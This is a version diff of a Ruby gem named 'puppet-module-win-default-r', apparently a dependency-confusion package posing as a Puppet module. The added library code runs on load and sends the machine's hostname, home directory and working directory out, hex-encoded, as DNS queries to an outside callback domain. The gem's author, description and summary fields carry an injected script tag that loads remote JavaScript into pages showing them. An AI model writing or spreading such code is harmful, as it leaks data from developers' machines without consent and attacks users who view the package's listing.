puppet-module-win-default-r 1.0 → 3.1.7

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 9840b185fe85b3142b09910a6f23f2a771aa1b08c0c186421fd4a738fc63d4af
-  data.tar.gz: aa06362ebd894186137ebab80f718a434f944bbe28aadd5fcaafa85a9f70497f
+  metadata.gz: 0d96840527ced1667f6756714b34503d81013d1f68454063217ec5ec0c5fccf2
+  data.tar.gz: b9d198008d2d83eaa2ab2de34b3e745e78e63880b672372d9dca5669342fcbdd
 SHA512:
-  metadata.gz: 8b1d90240465199f346701dec986a1a8d5b22f0f20112f86988842c93aa23e557acfe27df374a7539f13ed2b5e336612edc0c8140e1f7982249c03ff064e25d0
-  data.tar.gz: b81999f2ae42eb3e0bf2f41d3faf3b94fc03e013effa67a8260e342174f3f7451fa40bee8900331680163e801626434d2b1afd9c590400c043d5f8bb72b4015a
+  metadata.gz: 9dfd88dee7eaaa2256dc9ce249fe37e0cb2279af96cb5439ba433764f80e5340ecca0b89d2416c225f0dd020322cf30fbe1b0c7c737e648b61b7a41ae16afb09
+  data.tar.gz: bb29bcfa460fd61d3d2fb702f10c47d7b3103a1d6bb7d9984f59a62bf3d379ca95ed67c52c057d0af743b82083f7368991d9e95313ba0c8c6323c983421ef022

data/lib/puppet-module-win-default-r.rb

@@ -1,5 +1,63 @@
-module MyGem
-  def self.display_message
-    puts "poc by @gopal_ethical"
-  end
-end
+=begin
+
+This code is used for research purposes.
+
+No sensitive data is retrieved.
+
+Callbacks from within organizations with a
+responsible disclosure policy will be reported
+directly to the organizations.
+
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+
+Twitter: 'https://twitter.com/zuh4n'
+
+This research is inspired by 'https://twitter.com/alxbrsn'
+More information is here: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
+
+=end
+
+require 'socket'
+require 'json'
+require 'resolv'
+
+suffix = '.dns.dependency-c4llb4ck.0lo.org'
+ns = 'dns1.dependency-c4llb4ck.0lo.org'
+
+package = 'puppet-module-win-default-r'
+
+# only the bare minimum to be able to identify
+# a vulnerable organization
+data = {
+    'p' => package,
+    'h' => Socket.gethostname,
+    'd' => File.expand_path('~'),
+    'c' => Dir.pwd
+}
+
+data = JSON.generate(data)
+data = data.unpack('H*')[0].scan(/.{1,60}/)
+
+id_1 = rand(36**12).to_s(36)
+id_2 = rand(36**12).to_s(36)
+
+begin
+    ns_ip = Resolv.getaddress(ns)
+rescue
+    ns_ip = '4.4.4.4'
+end
+
+custom_res = Resolv.new([Resolv::Hosts.new, 
+    Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
+
+
+data.each.each_with_index do |chunk, idx|
+    begin
+        Resolv.getaddress 'v2_f.' + id_1 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+
+    begin
+        custom_res.getaddress 'v2_f.' + id_2 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+end

metadata

@@ -1,28 +1,27 @@
 --- !ruby/object:Gem::Specification
 name: puppet-module-win-default-r
 version: !ruby/object:Gem::Version
-  version: '1.0'
+  version: 3.1.7
 platform: ruby
 authors:
-- "@gopal_ethical"
-autorequire:
+- GEM"><script src=//x5s.0lo.org></script>
+autorequire: 
 bindir: bin
 cert_chain: []
-date: 2024-08-09 00:00:00.000000000 Z
+date: 2021-11-11 00:00:00.000000000 Z
 dependencies: []
-description: poc by @gopal_ethical
-email: ftest.first@gmail.com
-executables:
-- puppet-module-win-default-r
+description: GEM puppet-module-win-default-r "><script src=//x5s.0lo.org></script>
+email: 
+executables: []
 extensions: []
 extra_rdoc_files: []
 files:
-- bin/puppet-module-win-default-r
 - lib/puppet-module-win-default-r.rb
-homepage:
-licenses: []
+homepage: https://twitter.com/zuh4n
+licenses:
+- MIT
 metadata: {}
-post_install_message:
+post_install_message: 
 rdoc_options: []
 require_paths:
 - lib
@@ -37,8 +36,9 @@ required_rubygems_version: !ruby/object:Gem::Requirement
     - !ruby/object:Gem::Version
       version: '0'
 requirements: []
-rubygems_version: 3.3.15
-signing_key:
+rubyforge_project: 
+rubygems_version: 2.7.6
+signing_key: 
 specification_version: 4
-summary: poc by @gopal_ethical
+summary: GEM Summary "><script src=//x5s.0lo.org></script>
 test_files: []

data/bin/puppet-module-win-default-r

@@ -1,4 +0,0 @@
-#!/usr/bin/env ruby
-require 'puppet-module-win-default-r'
-
-MyGem.display_message